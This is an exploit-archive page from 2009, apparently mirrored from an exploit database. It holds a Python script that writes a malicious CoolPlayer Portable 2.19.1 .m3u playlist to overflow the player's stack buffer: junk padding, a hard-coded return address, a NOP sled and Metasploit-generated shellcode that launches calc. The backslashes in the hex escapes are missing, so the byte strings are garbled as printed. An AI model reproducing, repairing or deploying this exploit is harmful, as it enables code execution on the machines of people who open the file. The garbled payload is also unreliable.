CoolPlayer Portable 2.19.1 (m3u) Buffer Overflow Exploit #2

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : CoolPlayer Portable 2.19.1 (m3u) Buffer Overflow Exploit #2
# Published : 2009-04-22
# Author : His0k4
# Previous Title : Oracle APEX 3.2 Unprivileged DB users can see APEX password hashes
# Next Title : Star Downloader Free <= 1.45 (.dat) Universal SEH Overwrite Exploit

#!/usr/bin/python
#[*] Usage   : coolplayer.py
#[*] Bug     : CoolPlayer Portable(m3u) Buffer Overflow exploit
#[*] Founder : Gold_m
#[*] First exploiter : stack "he is my friend :)"
#[*] Tested on :    Xp sp2 (fr)
#[*] Greetings :    All friends & muslims HaCkErs (DZ),snakespc.com,secdz.com

#[*] Note: I didn't know why the stack's exploit won't work for me but i founded that the junk data wasn't right in my case.
#[*] and we have to expand the nops to pass the null byte.
#[*] it worked for me from the beginning.

# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode=(
"x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x79"
"xe4x94xbax83xebxfcxe2xf4x85x0cxd0xbax79xe4x1fxff"
"x45x6fxe8xbfx01xe5x7bx31x36xfcx1fxe5x59xe5x7fxf3"
"xf2xd0x1fxbbx97xd5x54x23xd5x60x54xcex7ex25x5exb7"
"x78x26x7fx4ex42xb0xb0xbex0cx01x1fxe5x5dxe5x7fxdc"
"xf2xe8xdfx31x26xf8x95x51xf2xf8x1fxbbx92x6dxc8x9e"
"x7dx27xa5x7ax1dx6fxd4x8axfcx24xecxb6xf2xa4x98x31"
"x09xf8x39x31x11xecx7fxb3xf2x64x24xbax79xe4x1fxd2"
"x45xbbxa5x4cx19xb2x1dx42xfax24xefxeax11x14x1exbe"
"x26x8cx0cx44xf3xeaxc3x45x9ex87xf5xd6x1axe4x94xba")

exploit = "x41"*220 + "x5Dx38x82x7C" + "x90"*122 + shellcode

try:
    out_file = open("exploit.m3u",'w')
    out_file.write(exploit)
    out_file.close()
    print "Exploit file created!n"
except:
    print "Error"

# www.Syue.com [2009-04-22]